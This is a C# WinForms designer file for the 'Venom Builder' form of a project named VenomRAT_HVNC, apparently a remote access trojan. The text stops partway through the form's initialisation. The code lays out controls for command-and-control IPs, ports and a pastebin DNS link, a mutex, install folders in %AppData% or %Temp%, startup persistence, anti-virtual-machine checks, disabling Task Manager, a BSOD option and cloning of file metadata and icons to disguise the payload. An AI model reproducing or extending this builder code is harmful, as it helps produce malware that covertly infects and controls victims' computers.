namespace VenomRAT_HVNC.Server.Forms
{
	public partial class FormBuilder : global::System.Windows.Forms.Form
	{
		protected override void Dispose(bool disposing)
		{
			if (disposing && this.components != null)
			{
				this.components.Dispose();
			}
			base.Dispose(disposing);
		}

		private void InitializeComponent()
		{
            this.components = new System.ComponentModel.Container();
            this.directoryEntry1 = new System.DirectoryServices.DirectoryEntry();
            this.toolTip1 = new System.Windows.Forms.ToolTip(this.components);
            this.label3 = new System.Windows.Forms.Label();
            this.label4 = new System.Windows.Forms.Label();
            this.picIcon = new System.Windows.Forms.PictureBox();
            this.label14 = new System.Windows.Forms.Label();
            this.label13 = new System.Windows.Forms.Label();
            this.label12 = new System.Windows.Forms.Label();
            this.label11 = new System.Windows.Forms.Label();
            this.label10 = new System.Windows.Forms.Label();
            this.label9 = new System.Windows.Forms.Label();
            this.label7 = new System.Windows.Forms.Label();
            this.label8 = new System.Windows.Forms.Label();
            this.label6 = new System.Windows.Forms.Label();
            this.label15 = new System.Windows.Forms.Label();
            this.comboBoxFolder = new Guna.UI2.WinForms.Guna2ComboBox();
            this.label18 = new System.Windows.Forms.Label();
            this.label19 = new System.Windows.Forms.Label();
            this.numDelay = new Guna.UI2.WinForms.Guna2NumericUpDown();
            this.label16 = new System.Windows.Forms.Label();
            this.chkPaste_bin = new Guna.UI2.WinForms.Guna2CheckBox();
            this.YourListPorts = new System.Windows.Forms.ListBox();
            this.YourListIPs = new System.Windows.Forms.ListBox();
            this.guna2DragControl1 = new Guna.UI2.WinForms.Guna2DragControl(this.components);
            this.guna2ShadowPanel1 = new Guna.UI2.WinForms.Guna2ShadowPanel();
            this.btnBuild = new Guna.UI2.WinForms.Guna2Button();
            this.guna2Panel1 = new Guna.UI2.WinForms.Guna2Panel();
            this.guna2ControlBox1 = new Guna.UI2.WinForms.Guna2ControlBox();
            this.label1 = new System.Windows.Forms.Label();
            this.guna2TabControl1 = new Guna.UI2.WinForms.Guna2TabControl();
            this.tabPage1 = new System.Windows.Forms.TabPage();
            this.guna2ShadowPanel2 = new Guna.UI2.WinForms.Guna2ShadowPanel();
            this.txtGroup = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtMutex = new Guna.UI2.WinForms.Guna2TextBox();
            this.label17 = new System.Windows.Forms.Label();
            this.label5 = new System.Windows.Forms.Label();
            this.textIP = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtPaste_bin = new Guna.UI2.WinForms.Guna2TextBox();
            this.textPort = new Guna.UI2.WinForms.Guna2TextBox();
            this.btnRemoveIP = new Guna.UI2.WinForms.Guna2Button();
            this.btnRemovePort = new Guna.UI2.WinForms.Guna2Button();
            this.btnAddIP = new Guna.UI2.WinForms.Guna2Button();
            this.btnAddPort = new Guna.UI2.WinForms.Guna2Button();
            this.tabPage2 = new System.Windows.Forms.TabPage();
            this.guna2ShadowPanel4 = new Guna.UI2.WinForms.Guna2ShadowPanel();
            this.textFilename = new Guna.UI2.WinForms.Guna2TextBox();
            this.chkAnti = new Guna.UI2.WinForms.Guna2CustomCheckBox();
            this.chkAntiProcess = new Guna.UI2.WinForms.Guna2CustomCheckBox();
            this.checkBox1 = new Guna.UI2.WinForms.Guna2CustomCheckBox();
            this.tabPage3 = new System.Windows.Forms.TabPage();
            this.guna2ShadowPanel3 = new Guna.UI2.WinForms.Guna2ShadowPanel();
            this.txtIcon = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtProductVersion = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtFileVersion = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtTrademarks = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtCompany = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtDescription = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtProduct = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtCopyright = new Guna.UI2.WinForms.Guna2TextBox();
            this.txtOriginalFilename = new Guna.UI2.WinForms.Guna2TextBox();
            this.btnAssembly = new Guna.UI2.WinForms.Guna2CustomCheckBox();
            this.chkIcon = new Guna.UI2.WinForms.Guna2CustomCheckBox();
            this.btnClone = new Guna.UI2.WinForms.Guna2Button();
            this.btnIcon = new Guna.UI2.WinForms.Guna2Button();
            this.chkBsod = new System.Windows.Forms.CheckBox();
            this.guna2DragControl2 = new Guna.UI2.WinForms.Guna2DragControl(this.components);
            this.guna2BorderlessForm1 = new Guna.UI2.WinForms.Guna2BorderlessForm(this.components);
            this.btnMutex = new Guna.UI2.WinForms.Guna2Button();
            ((System.ComponentModel.ISupportInitialize)(this.picIcon)).BeginInit();
            ((System.ComponentModel.ISupportInitialize)(this.numDelay)).BeginInit();
            this.guna2ShadowPanel1.SuspendLayout();
            this.guna2Panel1.SuspendLayout();
            this.guna2TabControl1.SuspendLayout();
            this.tabPage1.SuspendLayout();
            this.guna2ShadowPanel2.SuspendLayout();
            this.tabPage2.SuspendLayout();
            this.guna2ShadowPanel4.SuspendLayout();
            this.tabPage3.SuspendLayout();
            this.guna2ShadowPanel3.SuspendLayout();
            this.SuspendLayout();
            this.label3.AutoSize = true;
            this.label3.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label3.ForeColor = System.Drawing.Color.White;
            this.label3.Location = new System.Drawing.Point(295, 250);
            this.label3.Name = "label3";
            this.label3.Size = new System.Drawing.Size(75, 20);
            this.label3.TabIndex = 97;
            this.label3.Text = "File Path";
            this.label4.AutoSize = true;
            this.label4.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label4.ForeColor = System.Drawing.Color.White;
            this.label4.Location = new System.Drawing.Point(295, 188);
            this.label4.Name = "label4";
            this.label4.Size = new System.Drawing.Size(85, 20);
            this.label4.TabIndex = 98;
            this.label4.Text = "File Name";
            this.picIcon.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
            this.picIcon.ErrorImage = null;
            this.picIcon.InitialImage = null;
            this.picIcon.Location = new System.Drawing.Point(733, 186);
            this.picIcon.Margin = new System.Windows.Forms.Padding(3, 2, 3, 2);
            this.picIcon.Name = "picIcon";
            this.picIcon.Size = new System.Drawing.Size(115, 86);
            this.picIcon.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage;
            this.picIcon.TabIndex = 91;
            this.picIcon.TabStop = false;
            this.label14.AutoSize = true;
            this.label14.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label14.ForeColor = System.Drawing.Color.White;
            this.label14.Location = new System.Drawing.Point(147, 378);
            this.label14.Name = "label14";
            this.label14.Size = new System.Drawing.Size(134, 20);
            this.label14.TabIndex = 82;
            this.label14.Text = "Product Version:";
            this.label13.AutoSize = true;
            this.label13.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label13.ForeColor = System.Drawing.Color.White;
            this.label13.Location = new System.Drawing.Point(147, 417);
            this.label13.Name = "label13";
            this.label13.Size = new System.Drawing.Size(103, 20);
            this.label13.TabIndex = 81;
            this.label13.Text = "File Version:";
            this.label12.AutoSize = true;
            this.label12.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label12.ForeColor = System.Drawing.Color.White;
            this.label12.Location = new System.Drawing.Point(147, 338);
            this.label12.Name = "label12";
            this.label12.Size = new System.Drawing.Size(145, 20);
            this.label12.TabIndex = 80;
            this.label12.Text = "Original Filename:";
            this.label11.AutoSize = true;
            this.label11.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label11.ForeColor = System.Drawing.Color.White;
            this.label11.Location = new System.Drawing.Point(147, 299);
            this.label11.Name = "label11";
            this.label11.Size = new System.Drawing.Size(103, 20);
            this.label11.TabIndex = 79;
            this.label11.Text = "Trademarks:";
            this.label10.AutoSize = true;
            this.label10.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label10.ForeColor = System.Drawing.Color.White;
            this.label10.Location = new System.Drawing.Point(147, 260);
            this.label10.Name = "label10";
            this.label10.Size = new System.Drawing.Size(85, 20);
            this.label10.TabIndex = 78;
            this.label10.Text = "Copyright:";
            this.label9.AutoSize = true;
            this.label9.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label9.ForeColor = System.Drawing.Color.White;
            this.label9.Location = new System.Drawing.Point(147, 220);
            this.label9.Name = "label9";
            this.label9.Size = new System.Drawing.Size(84, 20);
            this.label9.TabIndex = 77;
            this.label9.Text = "Company:";
            this.label7.AutoSize = true;
            this.label7.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label7.ForeColor = System.Drawing.Color.White;
            this.label7.Location = new System.Drawing.Point(147, 181);
            this.label7.Name = "label7";
            this.label7.Size = new System.Drawing.Size(100, 20);
            this.label7.TabIndex = 75;
            this.label7.Text = "Description:";
            this.label8.AutoSize = true;
            this.label8.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label8.ForeColor = System.Drawing.Color.White;
            this.label8.Location = new System.Drawing.Point(147, 142);
            this.label8.Name = "label8";
            this.label8.Size = new System.Drawing.Size(72, 20);
            this.label8.TabIndex = 73;
            this.label8.Text = "Product:";
            this.label6.AutoSize = true;
            this.label6.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label6.ForeColor = System.Drawing.Color.White;
            this.label6.Location = new System.Drawing.Point(340, 144);
            this.label6.Name = "label6";
            this.label6.Size = new System.Drawing.Size(119, 20);
            this.label6.TabIndex = 81;
            this.label6.Text = "Enable Startup";
            this.label15.AutoSize = true;
            this.label15.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label15.ForeColor = System.Drawing.Color.White;
            this.label15.Location = new System.Drawing.Point(188, 75);
            this.label15.Name = "label15";
            this.label15.Size = new System.Drawing.Size(82, 20);
            this.label15.TabIndex = 81;
            this.label15.Text = "Assembly";
            this.comboBoxFolder.BackColor = System.Drawing.Color.Transparent;
            this.comboBoxFolder.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.comboBoxFolder.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed;
            this.comboBoxFolder.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
            this.comboBoxFolder.Enabled = false;
            this.comboBoxFolder.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.comboBoxFolder.FocusedColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.comboBoxFolder.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.comboBoxFolder.FocusedState.Parent = this.comboBoxFolder;
            this.comboBoxFolder.Font = new System.Drawing.Font("Segoe UI", 10F);
            this.comboBoxFolder.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(68)))), ((int)(((byte)(88)))), ((int)(((byte)(112)))));
            this.comboBoxFolder.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.comboBoxFolder.HoverState.Parent = this.comboBoxFolder;
            this.comboBoxFolder.ItemHeight = 30;
            this.comboBoxFolder.Items.AddRange(new object[] {
            "%AppData%",
            "%Temp%"});
            this.comboBoxFolder.ItemsAppearance.Parent = this.comboBoxFolder;
            this.comboBoxFolder.Location = new System.Drawing.Point(543, 234);
            this.comboBoxFolder.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.comboBoxFolder.Name = "comboBoxFolder";
            this.comboBoxFolder.ShadowDecoration.Parent = this.comboBoxFolder;
            this.comboBoxFolder.Size = new System.Drawing.Size(252, 36);
            this.comboBoxFolder.TabIndex = 120;
            this.label18.AutoSize = true;
            this.label18.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label18.ForeColor = System.Drawing.Color.White;
            this.label18.Location = new System.Drawing.Point(601, 314);
            this.label18.Name = "label18";
            this.label18.Size = new System.Drawing.Size(177, 20);
            this.label18.TabIndex = 81;
            this.label18.Text = "Disable Task Manager";
            this.label19.AutoSize = true;
            this.label19.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label19.ForeColor = System.Drawing.Color.White;
            this.label19.Location = new System.Drawing.Point(333, 313);
            this.label19.Name = "label19";
            this.label19.Size = new System.Drawing.Size(160, 20);
            this.label19.TabIndex = 81;
            this.label19.Text = "Anti-Virtual Machine";
            this.numDelay.BackColor = System.Drawing.Color.Transparent;
            this.numDelay.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.numDelay.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.numDelay.DisabledState.Parent = this.numDelay;
            this.numDelay.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.numDelay.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.numDelay.FocusedState.Parent = this.numDelay;
            this.numDelay.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.numDelay.ForeColor = System.Drawing.Color.Black;
            this.numDelay.Location = new System.Drawing.Point(691, 143);
            this.numDelay.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.numDelay.Name = "numDelay";
            this.numDelay.ShadowDecoration.Parent = this.numDelay;
            this.numDelay.Size = new System.Drawing.Size(105, 33);
            this.numDelay.TabIndex = 121;
            this.numDelay.UpDownButtonFillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.label16.AutoSize = true;
            this.label16.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label16.ForeColor = System.Drawing.Color.White;
            this.label16.Location = new System.Drawing.Point(539, 149);
            this.label16.Name = "label16";
            this.label16.Size = new System.Drawing.Size(130, 20);
            this.label16.TabIndex = 73;
            this.label16.Text = "Execution Delay";
            this.chkPaste_bin.AutoSize = true;
            this.chkPaste_bin.BackColor = System.Drawing.Color.Transparent;
            this.chkPaste_bin.CheckedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(0)))), ((int)(((byte)(150)))), ((int)(((byte)(106)))));
            this.chkPaste_bin.CheckedState.BorderRadius = 1;
            this.chkPaste_bin.CheckedState.BorderThickness = 0;
            this.chkPaste_bin.CheckedState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(0)))), ((int)(((byte)(150)))), ((int)(((byte)(106)))));
            this.chkPaste_bin.CheckMarkColor = System.Drawing.Color.Black;
            this.chkPaste_bin.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F);
            this.chkPaste_bin.ForeColor = System.Drawing.Color.White;
            this.chkPaste_bin.Location = new System.Drawing.Point(192, 331);
            this.chkPaste_bin.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.chkPaste_bin.Name = "chkPaste_bin";
            this.chkPaste_bin.Size = new System.Drawing.Size(147, 22);
            this.chkPaste_bin.TabIndex = 122;
            this.chkPaste_bin.Text = " Add DNS By Link";
            this.chkPaste_bin.UncheckedState.BorderColor = System.Drawing.Color.White;
            this.chkPaste_bin.UncheckedState.BorderRadius = 0;
            this.chkPaste_bin.UncheckedState.BorderThickness = 0;
            this.chkPaste_bin.UncheckedState.FillColor = System.Drawing.Color.White;
            this.chkPaste_bin.UseVisualStyleBackColor = false;
            this.chkPaste_bin.CheckedChanged += new System.EventHandler(this.CheckBox2_CheckedChanged);
            this.YourListPorts.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.YourListPorts.ForeColor = System.Drawing.Color.Gainsboro;
            this.YourListPorts.FormattingEnabled = true;
            this.YourListPorts.ItemHeight = 16;
            this.YourListPorts.Location = new System.Drawing.Point(685, 175);
            this.YourListPorts.Margin = new System.Windows.Forms.Padding(3, 0, 3, 2);
            this.YourListPorts.Name = "YourListPorts";
            this.YourListPorts.Size = new System.Drawing.Size(301, 36);
            this.YourListPorts.TabIndex = 65;
            this.YourListIPs.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.YourListIPs.ForeColor = System.Drawing.Color.Gainsboro;
            this.YourListIPs.FormattingEnabled = true;
            this.YourListIPs.ItemHeight = 16;
            this.YourListIPs.Location = new System.Drawing.Point(192, 175);
            this.YourListIPs.Margin = new System.Windows.Forms.Padding(3, 2, 3, 2);
            this.YourListIPs.Name = "YourListIPs";
            this.YourListIPs.Size = new System.Drawing.Size(301, 36);
            this.YourListIPs.TabIndex = 70;
            this.guna2ShadowPanel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2ShadowPanel1.Controls.Add(this.btnBuild);
            this.guna2ShadowPanel1.Controls.Add(this.guna2Panel1);
            this.guna2ShadowPanel1.Controls.Add(this.guna2TabControl1);
            this.guna2ShadowPanel1.Cursor = System.Windows.Forms.Cursors.AppStarting;
            this.guna2ShadowPanel1.Dock = System.Windows.Forms.DockStyle.Fill;
            this.guna2ShadowPanel1.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.guna2ShadowPanel1.ForeColor = System.Drawing.Color.Transparent;
            this.guna2ShadowPanel1.Location = new System.Drawing.Point(0, 0);
            this.guna2ShadowPanel1.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.guna2ShadowPanel1.Name = "guna2ShadowPanel1";
            this.guna2ShadowPanel1.ShadowColor = System.Drawing.Color.Lime;
            this.guna2ShadowPanel1.ShadowDepth = 8;
            this.guna2ShadowPanel1.ShadowShift = 2;
            this.guna2ShadowPanel1.Size = new System.Drawing.Size(1333, 810);
            this.guna2ShadowPanel1.TabIndex = 125;
            this.guna2ShadowPanel1.Paint += new System.Windows.Forms.PaintEventHandler(this.guna2ShadowPanel1_Paint);
            this.btnBuild.Animated = true;
            this.btnBuild.BorderColor = System.Drawing.Color.Maroon;
            this.btnBuild.BorderRadius = 5;
            this.btnBuild.CheckedState.Parent = this.btnBuild;
            this.btnBuild.CustomImages.Parent = this.btnBuild;
            this.btnBuild.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnBuild.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnBuild.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnBuild.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnBuild.DisabledState.Parent = this.btnBuild;
            this.btnBuild.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnBuild.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnBuild.ForeColor = System.Drawing.Color.White;
            this.btnBuild.HoverState.Parent = this.btnBuild;
            this.btnBuild.Location = new System.Drawing.Point(32, 738);
            this.btnBuild.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnBuild.Name = "btnBuild";
            this.btnBuild.ShadowDecoration.Parent = this.btnBuild;
            this.btnBuild.Size = new System.Drawing.Size(1275, 57);
            this.btnBuild.TabIndex = 125;
            this.btnBuild.Text = "Build";
            this.btnBuild.Click += new System.EventHandler(this.BtnBuild_Click);
            this.guna2Panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2Panel1.Controls.Add(this.guna2ControlBox1);
            this.guna2Panel1.Controls.Add(this.label1);
            this.guna2Panel1.Dock = System.Windows.Forms.DockStyle.Top;
            this.guna2Panel1.Location = new System.Drawing.Point(0, 0);
            this.guna2Panel1.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.guna2Panel1.Name = "guna2Panel1";
            this.guna2Panel1.ShadowDecoration.Parent = this.guna2Panel1;
            this.guna2Panel1.Size = new System.Drawing.Size(1333, 53);
            this.guna2Panel1.TabIndex = 124;
            this.guna2ControlBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
            this.guna2ControlBox1.FillColor = System.Drawing.Color.Transparent;
            this.guna2ControlBox1.HoverState.Parent = this.guna2ControlBox1;
            this.guna2ControlBox1.IconColor = System.Drawing.Color.White;
            this.guna2ControlBox1.Location = new System.Drawing.Point(1257, 6);
            this.guna2ControlBox1.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.guna2ControlBox1.Name = "guna2ControlBox1";
            this.guna2ControlBox1.ShadowDecoration.Parent = this.guna2ControlBox1;
            this.guna2ControlBox1.Size = new System.Drawing.Size(60, 36);
            this.guna2ControlBox1.TabIndex = 1;
            this.label1.AutoSize = true;
            this.label1.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label1.Location = new System.Drawing.Point(557, 15);
            this.label1.Margin = new System.Windows.Forms.Padding(4, 0, 4, 0);
            this.label1.Name = "label1";
            this.label1.Size = new System.Drawing.Size(140, 25);
            this.label1.TabIndex = 0;
            this.label1.Text = "Venom Builder";
            this.guna2TabControl1.Controls.Add(this.tabPage1);
            this.guna2TabControl1.Controls.Add(this.tabPage2);
            this.guna2TabControl1.Controls.Add(this.tabPage3);
            this.guna2TabControl1.ItemSize = new System.Drawing.Size(180, 40);
            this.guna2TabControl1.Location = new System.Drawing.Point(27, 76);
            this.guna2TabControl1.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.guna2TabControl1.Name = "guna2TabControl1";
            this.guna2TabControl1.SelectedIndex = 0;
            this.guna2TabControl1.Size = new System.Drawing.Size(1280, 654);
            this.guna2TabControl1.TabButtonHoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2TabControl1.TabButtonHoverState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(30)))), ((int)(((byte)(30)))), ((int)(((byte)(30)))));
            this.guna2TabControl1.TabButtonHoverState.Font = new System.Drawing.Font("Segoe UI Semibold", 10F);
            this.guna2TabControl1.TabButtonHoverState.ForeColor = System.Drawing.Color.White;
            this.guna2TabControl1.TabButtonHoverState.InnerColor = System.Drawing.Color.FromArgb(((int)(((byte)(30)))), ((int)(((byte)(30)))), ((int)(((byte)(30)))));
            this.guna2TabControl1.TabButtonIdleState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2TabControl1.TabButtonIdleState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(30)))), ((int)(((byte)(30)))), ((int)(((byte)(30)))));
            this.guna2TabControl1.TabButtonIdleState.Font = new System.Drawing.Font("Segoe UI Semibold", 10F);
            this.guna2TabControl1.TabButtonIdleState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(156)))), ((int)(((byte)(160)))), ((int)(((byte)(167)))));
            this.guna2TabControl1.TabButtonIdleState.InnerColor = System.Drawing.Color.FromArgb(((int)(((byte)(30)))), ((int)(((byte)(30)))), ((int)(((byte)(30)))));
            this.guna2TabControl1.TabButtonSelectedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2TabControl1.TabButtonSelectedState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(29)))), ((int)(((byte)(29)))), ((int)(((byte)(29)))));
            this.guna2TabControl1.TabButtonSelectedState.Font = new System.Drawing.Font("Segoe UI Semibold", 10F);
            this.guna2TabControl1.TabButtonSelectedState.ForeColor = System.Drawing.Color.White;
            this.guna2TabControl1.TabButtonSelectedState.InnerColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2TabControl1.TabButtonSize = new System.Drawing.Size(180, 40);
            this.guna2TabControl1.TabIndex = 123;
            this.guna2TabControl1.TabMenuBackColor = System.Drawing.Color.FromArgb(((int)(((byte)(30)))), ((int)(((byte)(30)))), ((int)(((byte)(30)))));
            this.guna2TabControl1.TabMenuOrientation = Guna.UI2.WinForms.TabMenuOrientation.HorizontalTop;
            this.tabPage1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.tabPage1.Controls.Add(this.guna2ShadowPanel2);
            this.tabPage1.Location = new System.Drawing.Point(4, 44);
            this.tabPage1.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.tabPage1.Name = "tabPage1";
            this.tabPage1.Padding = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.tabPage1.Size = new System.Drawing.Size(1272, 606);
            this.tabPage1.TabIndex = 0;
            this.tabPage1.Text = "IP/DNS";
            this.guna2ShadowPanel2.BackColor = System.Drawing.Color.Transparent;
            this.guna2ShadowPanel2.Controls.Add(this.btnMutex);
            this.guna2ShadowPanel2.Controls.Add(this.txtGroup);
            this.guna2ShadowPanel2.Controls.Add(this.txtMutex);
            this.guna2ShadowPanel2.Controls.Add(this.label17);
            this.guna2ShadowPanel2.Controls.Add(this.label5);
            this.guna2ShadowPanel2.Controls.Add(this.textIP);
            this.guna2ShadowPanel2.Controls.Add(this.txtPaste_bin);
            this.guna2ShadowPanel2.Controls.Add(this.textPort);
            this.guna2ShadowPanel2.Controls.Add(this.btnRemoveIP);
            this.guna2ShadowPanel2.Controls.Add(this.btnRemovePort);
            this.guna2ShadowPanel2.Controls.Add(this.btnAddIP);
            this.guna2ShadowPanel2.Controls.Add(this.btnAddPort);
            this.guna2ShadowPanel2.Controls.Add(this.YourListPorts);
            this.guna2ShadowPanel2.Controls.Add(this.chkPaste_bin);
            this.guna2ShadowPanel2.Controls.Add(this.YourListIPs);
            this.guna2ShadowPanel2.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.guna2ShadowPanel2.Location = new System.Drawing.Point(49, 46);
            this.guna2ShadowPanel2.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.guna2ShadowPanel2.Name = "guna2ShadowPanel2";
            this.guna2ShadowPanel2.ShadowColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2ShadowPanel2.ShadowDepth = 200;
            this.guna2ShadowPanel2.ShadowShift = 7;
            this.guna2ShadowPanel2.Size = new System.Drawing.Size(1172, 514);
            this.guna2ShadowPanel2.TabIndex = 123;
            this.guna2ShadowPanel2.Paint += new System.Windows.Forms.PaintEventHandler(this.guna2ShadowPanel2_Paint);
            this.txtGroup.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtGroup.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtGroup.DefaultText = "Venom Clients";
            this.txtGroup.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtGroup.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtGroup.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtGroup.DisabledState.Parent = this.txtGroup;
            this.txtGroup.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtGroup.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
